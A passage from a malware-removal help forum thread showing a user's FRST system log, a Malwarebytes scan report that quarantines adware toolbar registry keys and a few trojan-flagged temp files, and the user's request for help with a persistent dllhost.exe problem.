C:\Windows\system32\ie4uinit.exe 2014-10-16 18:55 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2014-10-16 18:55 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2014-10-16 18:55 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-10-16 18:55 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2014-10-16 18:55 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-10-16 18:55 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2014-10-16 18:55 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-10-16 18:55 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-10-16 18:55 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2014-10-16 18:55 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-10-16 18:55 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL 2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL 2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL 2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL 2014-10-16 18:55 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL 2014-10-16 18:55 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL 2014-10-16 18:55 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL 2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL 2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL 2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL 2014-10-16 18:55 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls 2014-10-16 18:55 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls 2014-10-16 18:55 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2014-10-16 18:55 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2014-10-16 18:55 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll 2014-10-16 18:55 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll 2014-10-16 18:55 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll 2014-10-16 18:55 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll 2014-10-16 18:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-10-16 18:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-10-16 18:52 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-10-16 18:52 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-10-16 18:52 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2014-10-16 18:52 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2014-10-16 18:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2014-10-16 18:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2014-10-16 18:52 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2014-10-16 18:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-10-16 18:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-10-16 18:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2014-10-16 18:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2014-10-16 18:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-10-16 18:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-10-16 18:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2014-10-16 18:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-10-16 18:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-10-16 18:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2014-10-16 18:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2014-10-15 13:24 - 2014-10-15 13:26 - 25074304 _____ () C:\Users\Swintal\Downloads\United 319.zip 2014-10-15 13:13 - 2014-10-15 13:13 - 00122208 _____ () C:\Users\Swintal\Downloads\Airbus_ECAMD2D.zip 2014-10-15 13:11 - 2014-10-15 13:11 - 00134976 _____ () C:\Users\Swintal\Downloads\AB_ND_GDI.zip 2014-10-15 13:03 - 2014-10-15 13:03 - 03873168 _____ () C:\Users\Swintal\Downloads\HF_AIRBUS31819_1_02c.zip 2014-10-12 13:36 - 2014-10-12 13:36 - 00262144 _____ () C:\Windows\Minidump\101214-20841-01.dmp ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-11 21:33 - 2014-03-14 19:49 - 00004990 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC 2014-11-11 21:32 - 2014-10-03 14:53 - 00000000 ___RD () C:\Users\Swintal\iCloudDrive 2014-11-11 21:31 - 2014-03-01 12:59 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-11-11 21:31 - 2009-07-13 23:51 - 00120950 _____ () C:\Windows\setupact.log 2014-11-11 21:30 - 2014-03-01 16:09 - 00000000 ____D () C:\ProgramData\NVIDIA 2014-11-11 21:30 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-11-11 21:24 - 2014-07-03 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Navtech 2014-11-11 21:24 - 2014-03-02 13:18 - 00000000 ____D () C:\ProgramData\Licenses 2014-11-11 21:24 - 2014-03-01 19:40 - 00000000 ____D () C:\Microsoft Flight Simulator X 2014-11-11 21:24 - 2014-03-01 16:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2014-11-11 21:24 - 2014-03-01 16:22 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation 2014-11-11 21:24 - 2014-03-01 16:21 - 00000000 ____D () C:\Program Files\NVIDIA Corporation 2014-11-11 21:19 - 2014-07-10 17:00 - 00000000 ____D () C:\Windows\SysWOW64\Macromed 2014-11-11 21:19 - 2014-07-10 17:00 - 00000000 ____D () C:\Windows\system32\Macromed 2014-11-11 21:19 - 2014-05-17 14:39 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-11-11 21:19 - 2014-03-16 13:14 - 00000000 ___RD () C:\Users\Swintal\Google Drive 2014-11-11 21:19 - 2014-03-02 15:57 - 00000000 ____D () C:\Windows\Minidump 2014-11-11 21:19 - 2014-03-02 13:18 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Virtuali 2014-11-11 21:19 - 2014-03-01 12:28 - 00000000 ____D () C:\Users\Swintal 2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration 2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions 2014-11-11 21:16 - 2014-08-10 14:33 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job 2014-11-11 21:13 - 2014-03-01 15:15 - 01648133 _____ () C:\Windows\WindowsUpdate.log 2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-11-11 21:07 - 2014-03-02 15:57 - 1095844079 _____ () C:\Windows\MEMORY.DMP 2014-11-11 17:05 - 2014-07-10 17:00 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-11-11 16:58 - 2014-03-01 12:59 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-11-11 16:15 - 2010-11-20 22:47 - 00099780 _____ () C:\Windows\PFRO.log 2014-11-11 15:05 - 2014-07-10 17:00 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-11-11 15:05 - 2014-07-10 17:00 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-11-11 15:05 - 2014-07-10 17:00 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater 2014-11-11 14:56 - 2014-06-07 15:03 - 00000000 ____D () C:\Users\Public\Documents\PFPX Data 2014-11-11 14:56 - 2014-03-02 14:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft 2014-11-11 14:56 - 2014-03-01 12:36 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information 2014-11-11 13:19 - 2014-03-02 13:18 - 00000000 ____D () C:\ProgramData\TEMP 2014-11-11 13:18 - 2014-03-01 20:09 - 00000000 ____D () C:\Users\Swintal\Documents\Flight Simulator X Files 2014-11-11 13:00 - 2014-03-08 12:42 - 00000000 ____D () C:\Users\Swintal\Downloads\WOAi 2014-11-11 12:54 - 2014-03-03 10:22 - 00000000 ____D () C:\Users\Swintal\Downloads\LUVCARS_4_Build_1_Beta_6 2014-11-11 12:41 - 2014-09-14 14:16 - 00000000 ____D () C:\Users\Swintal\Documents\Paradox Interactive 2014-11-11 12:41 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\Documents\RCT3 2014-11-11 12:40 - 2014-09-29 18:55 - 00000000 ____D () C:\Users\Swintal\Desktop\Jake Photos 2014-11-11 12:40 - 2014-08-16 13:04 - 00000000 ____D () C:\Users\Swintal\Documents\FS Flight Keeper 2014-11-11 12:40 - 2014-05-11 15:32 - 00000000 ___SD () C:\Users\Swintal\Documents\My Data Sources 2014-11-11 12:40 - 2014-03-15 11:44 - 00000000 ____D () C:\Users\Swintal\Documents\Garmin 2014-11-11 12:40 - 2014-03-14 13:01 - 00000000 ____D () C:\Users\Swintal\Documents\Aerosoft 2014-11-11 12:40 - 2014-03-07 16:55 - 00000000 ____D () C:\Users\Swintal\Documents\Andreas Folder 2014-11-11 12:39 - 2014-10-04 11:39 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\NBSoftSolutions 2014-11-11 12:39 - 2014-03-02 12:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\PMDG 2014-11-11 12:38 - 2014-09-27 06:31 - 00000000 ____D () C:\Users\Swintal\AppData\Local\PI Engineering 2014-11-11 12:38 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Atari 2014-11-11 12:38 - 2014-06-20 16:15 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Juniper Networks 2014-11-11 12:38 - 2014-05-16 07:45 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Origin 2014-11-11 12:38 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Apple Computer 2014-11-11 12:38 - 2014-03-15 11:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Garmin 2014-11-11 12:37 - 2014-03-16 09:43 - 00000000 ____D () C:\Users\Swintal\AppData\Local\HP 2014-11-11 12:37 - 2014-03-01 12:59 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Google 2014-11-11 12:36 - 2014-03-02 16:42 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apps\2.0 2014-11-11 12:35 - 2014-10-03 14:52 - 00000000 ____D () C:\Users\Swintal\AppData\Local\AAC7AD0A-50D1-41BC-A353-7B7B50729544.aplzod 2014-11-11 12:35 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apple Computer 2014-11-11 12:34 - 2014-05-16 07:42 - 00000000 ____D () C:\ProgramData\Origin 2014-11-11 12:34 - 2014-03-15 11:42 - 00000000 ____D () C:\ProgramData\Garmin 2014-11-11 10:16 - 2014-08-10 14:33 - 00000864 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job 2014-11-11 08:01 - 2014-03-02 12:38 - 00116616 _____ () C:\Users\Swintal\AppData\Local\GDIPFONTCACHEV1.DAT 2014-11-11 07:59 - 2009-07-13 23:45 - 00448104 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-11-11 07:57 - 2014-03-01 19:17 - 00729172 _____ () C:\Windows\DirectX.log 2014-11-09 20:19 - 2014-03-02 13:08 - 00002010 _____ () C:\Users\Swintal\AppData\Roaming\mainhst.zgh 2014-11-09 17:26 - 2014-07-03 17:20 - 00002609 _____ () C:\Users\Public\Desktop\Navtech PBS.lnk 2014-11-08 13:44 - 2014-06-30 16:00 - 00000000 ____D () C:\Program Files (x86)\Steam 2014-11-08 08:30 - 2009-07-14 00:13 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-07 17:49 - 2014-10-03 14:34 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69 2014-11-07 17:49 - 2014-04-05 18:18 - 00000000 ____D () C:\Program Files\Common Files\Apple 2014-11-06 12:06 - 2014-09-01 15:44 - 01715224 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll 2014-11-06 12:06 - 2014-09-01 15:44 - 01291280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll 2014-11-06 12:06 - 2014-03-01 16:24 - 02800296 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll 2014-11-06 12:06 - 2014-03-01 16:24 - 02197680 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll 2014-11-05 12:48 - 2014-05-18 08:27 - 00000000 ____D () C:\ProgramData\ACARS 2014-11-05 11:00 - 2014-03-16 13:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive 2014-11-04 15:40 - 2014-03-01 18:40 - 00000000 ____D () C:\Windows\system32\MRT 2014-11-01 17:05 - 2014-06-07 15:06 - 00000777 _____ () C:\Users\Public\Desktop\Aerosoft Launcher.lnk 2014-11-01 16:54 - 2014-08-16 12:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UK2000 Scenery 2014-11-01 13:07 - 2014-03-02 12:28 - 00014352 _____ () C:\Users\Swintal\Downloads\Activation Code Workbook.xlsx 2014-10-28 09:00 - 2014-03-01 13:00 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-10-28 08:14 - 2009-07-14 00:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-10-28 05:34 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-10-26 09:21 - 2014-05-18 08:27 - 00002041 _____ () C:\Users\Public\Desktop\UVACARS.lnk 2014-10-25 09:50 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF 2014-10-25 07:53 - 2014-03-03 09:26 - 00000000 ____D () C:\Program Files\Microsoft Office 15 2014-10-19 08:53 - 2014-03-01 12:59 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-19 08:53 - 2014-03-01 12:59 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-18 09:11 - 2014-08-10 14:33 - 00003890 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA 2014-10-18 09:11 - 2014-08-10 14:33 - 00003494 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core 2014-10-17 03:00 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache Files to move or delete: ==================== C:\Users\Swintal\FlightBeam_Denver International - HD.reg C:\Users\Swintal\FlightBeam_Washington Dulles Intl - HD.reg C:\Users\Swintal\FSDreamTeam_JFK.reg C:\Users\Swintal\FSDreamTeam_KIAH.reg C:\Users\Swintal\FSDreamTeam_Los Angeles V2.reg C:\Users\Swintal\QualityWings_Ultimate 757 Collection.reg Some content of TEMP: ==================== C:\Users\Swintal\AppData\Local\Temp\Couponscom.exe C:\Users\Swintal\AppData\Local\Temp\dsHostCheckerSetup.exe C:\Users\Swintal\AppData\Local\Temp\InstHelper.exe C:\Users\Swintal\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe C:\Users\Swintal\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe C:\Users\Swintal\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe C:\Users\Swintal\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI.dll C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI64.dll C:\Users\Swintal\AppData\Local\Temp\nvStInst.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-11-05 12:09 ==================== End Of Log ============================
  4. rampantfox83
    Here is the malwarebytes anti-malware scan Malwarebytes Anti-Malwarewww.malwarebytes.org Scan Date: 11/11/2014Scan Time: 3:46:02 PMLogfile: malwarebytes.txtAdministrator: Yes Version: 2.00.3.1025Malware Database: v2014.11.11.08Rootkit Database: v2014.11.11.01License: TrialMalware Protection: EnabledMalicious Website Protection: EnabledSelf-protection: Disabled OS: Windows 7 Service Pack 1CPU: x64File System: NTFSUser: Swintal Scan Type: Threat ScanResult: CompletedObjects Scanned: 428473Time Elapsed: 20 min, 45 sec Memory: EnabledStartup: EnabledFilesystem: EnabledArchives: EnabledRootkits: DisabledHeuristics: EnabledPUP: EnabledPUM: Enabled Processes: 0(No malicious items detected) Modules: 0(No malicious items detected) Registry Keys: 33PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], Registry Values: 2PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [394bb684f488b383c8367b3b8d758080], Registry Data: 0(No malicious items detected) Folders: 0(No malicious items detected) Files: 3Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2A9C.tmp, Quarantined, [404476c47b015cdab8b442a036cb8080], Trojan.Agent, C:\Users\Swintal\AppData\Local\Temp\FlyTampa_Libraries_FSX_P3D.exe, Quarantined, [8bf998a2413bd363f57b8bd7f0103ac6], Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2B47.tmp, Quarantined, [800484b6c5b7d660de8ea939738e867a], Physical Sectors: 0(No malicious items detected) (end)
  5. rampantfox83
    I'm afraid I too must join those that are having an issue with this piece of malware. I ran the malwarebytes anti-malware scanner and it removed several issues but the COM Surrogate dllhost.exe*32 issue still remains. Any help that can be provided will be extremely helpful! Thanks, Brian Addition.txt FRST.txt
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.